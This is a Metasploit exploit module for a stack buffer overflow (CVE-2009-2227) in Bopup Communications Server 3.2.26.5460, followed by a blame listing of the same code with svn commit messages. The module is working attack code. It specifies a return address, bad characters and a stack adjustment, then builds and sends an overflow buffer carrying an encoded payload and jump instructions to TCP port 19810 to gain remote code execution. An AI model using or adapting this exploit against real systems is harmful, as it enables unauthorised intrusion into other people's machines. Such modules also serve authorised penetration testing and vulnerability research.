metasploit-framework/modules/exploits/windows/misc/bopup_comm.rb

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Bopup Communications Server Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in Bopup Communications Server 3.2.26.5460.
					By sending a specially crafted packet, an attacker may be
					able to execute arbitrary code.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2009-2227' ],
					[ 'OSVDB', '55275' ],
					[ 'URL', 'http://www.blabsoft.com/products/server' ],
					[ 'URL', 'http://milw0rm.com/exploits/9002' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 417,
					'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40",
					'StackAdjustment' => -3500,
					'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Bopup Communications Server 3.2.26.5460',   { 'Ret' => 0x0041add2 } ],
				],
			'Privileged'     => true,
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Jun 18 2009'))

		register_options(
			[
				Opt::RPORT(19810)
			], self.class)
	end

	def exploit
		connect

		sploit =  [0x00000001].pack('V')
		sploit << rand_text_alpha_upper(829 - payload.encoded.length)
		sploit << payload.encoded
		sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "call $-380").encode_string
		sploit << rand_text_alpha_upper(27)
		sploit << Rex::Arch::X86.jmp_short(222) + rand_text_english(2)
		sploit << [target.ret].pack('V')

		print_status("Trying target #{target.name}...")
		sock.put(sploit)

		handler
		disconnect
	end

end
added exploit module bopup_comm.rb git-svn-id: file:///home/svn/framework3/trunk@6721 4d416f70-5f16-0410-b530-b9f4589650da 2009-06-27 16:31:29 +02:00			`##`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 10:40:19 +02:00			`# $Id$`
			`##`

			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
added exploit module bopup_comm.rb git-svn-id: file:///home/svn/framework3/trunk@6721 4d416f70-5f16-0410-b530-b9f4589650da 2009-06-27 16:31:29 +02:00			`# redistribution and commercial restrictions. Please see the Metasploit`
			`# Framework web site for more information on licensing and terms of use.`
			`# http://metasploit.com/framework/`
			`##`

			`require 'msf/core'`

			`class Metasploit3 < Msf::Exploit::Remote`
add ranking to every exploit module, pfew! git-svn-id: file:///home/svn/framework3/trunk@7724 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-06 06:50:37 +01:00			`Rank = GoodRanking`
added exploit module bopup_comm.rb git-svn-id: file:///home/svn/framework3/trunk@6721 4d416f70-5f16-0410-b530-b9f4589650da 2009-06-27 16:31:29 +02:00
			`include Msf::Exploit::Remote::Tcp`

			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'Bopup Communications Server Buffer Overflow',`
			`'Description' => %q{`
stop perpetuating the ambiguity! git-svn-id: file:///home/svn/framework3/trunk@9262 4d416f70-5f16-0410-b530-b9f4589650da 2010-05-09 19:45:00 +02:00			`This module exploits a stack buffer overflow in Bopup Communications Server 3.2.26.5460.`
added exploit module bopup_comm.rb git-svn-id: file:///home/svn/framework3/trunk@6721 4d416f70-5f16-0410-b530-b9f4589650da 2009-06-27 16:31:29 +02:00			`By sending a specially crafted packet, an attacker may be`
			`able to execute arbitrary code.`
			`},`
			`'Author' => [ 'MC' ],`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 10:40:19 +02:00			`'License' => MSF_LICENSE,`
svn:keywords run git-svn-id: file:///home/svn/framework3/trunk@6876 4d416f70-5f16-0410-b530-b9f4589650da 2009-07-23 04:55:51 +02:00			`'Version' => '$Revision$',`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 10:40:19 +02:00			`'References' =>`
			`[`
added some missing CVE references git-svn-id: file:///home/svn/framework3/trunk@7719 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-06 03:30:42 +01:00			`[ 'CVE', '2009-2227' ],`
OSVDB references updates from Steve Tornio git-svn-id: file:///home/svn/framework3/trunk@6812 4d416f70-5f16-0410-b530-b9f4589650da 2009-07-16 18:02:24 +02:00			`[ 'OSVDB', '55275' ],`
added exploit module bopup_comm.rb git-svn-id: file:///home/svn/framework3/trunk@6721 4d416f70-5f16-0410-b530-b9f4589650da 2009-06-27 16:31:29 +02:00			`[ 'URL', 'http://www.blabsoft.com/products/server' ],`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 10:40:19 +02:00			`[ 'URL', 'http://milw0rm.com/exploits/9002' ],`
added exploit module bopup_comm.rb git-svn-id: file:///home/svn/framework3/trunk@6721 4d416f70-5f16-0410-b530-b9f4589650da 2009-06-27 16:31:29 +02:00			`],`
			`'DefaultOptions' =>`
			`{`
			`'EXITFUNC' => 'thread',`
			`},`
			`'Payload' =>`
			`{`
			`'Space' => 417,`
			`'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40",`
			`'StackAdjustment' => -3500,`
			`'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",`
			`},`
			`'Platform' => 'win',`
			`'Targets' =>`
			`[`
			`[ 'Bopup Communications Server 3.2.26.5460', { 'Ret' => 0x0041add2 } ],`
			`],`
			`'Privileged' => true,`
			`'DefaultTarget' => 0,`
			`'DisclosureDate' => 'Jun 18 2009'))`

big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 10:40:19 +02:00			`register_options(`
			`[`
			`Opt::RPORT(19810)`
			`], self.class)`
added exploit module bopup_comm.rb git-svn-id: file:///home/svn/framework3/trunk@6721 4d416f70-5f16-0410-b530-b9f4589650da 2009-06-27 16:31:29 +02:00			`end`

			`def exploit`
			`connect`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 10:40:19 +02:00
added exploit module bopup_comm.rb git-svn-id: file:///home/svn/framework3/trunk@6721 4d416f70-5f16-0410-b530-b9f4589650da 2009-06-27 16:31:29 +02:00			`sploit = [0x00000001].pack('V')`
			`sploit << rand_text_alpha_upper(829 - payload.encoded.length)`
			`sploit << payload.encoded`
			`sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "call $-380").encode_string`
			`sploit << rand_text_alpha_upper(27)`
			`sploit << Rex::Arch::X86.jmp_short(222) + rand_text_english(2)`
			`sploit << [target.ret].pack('V')`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 10:40:19 +02:00
			`print_status("Trying target #{target.name}...")`
added exploit module bopup_comm.rb git-svn-id: file:///home/svn/framework3/trunk@6721 4d416f70-5f16-0410-b530-b9f4589650da 2009-06-27 16:31:29 +02:00			`sock.put(sploit)`

			`handler`
			`disconnect`
			`end`

			`end`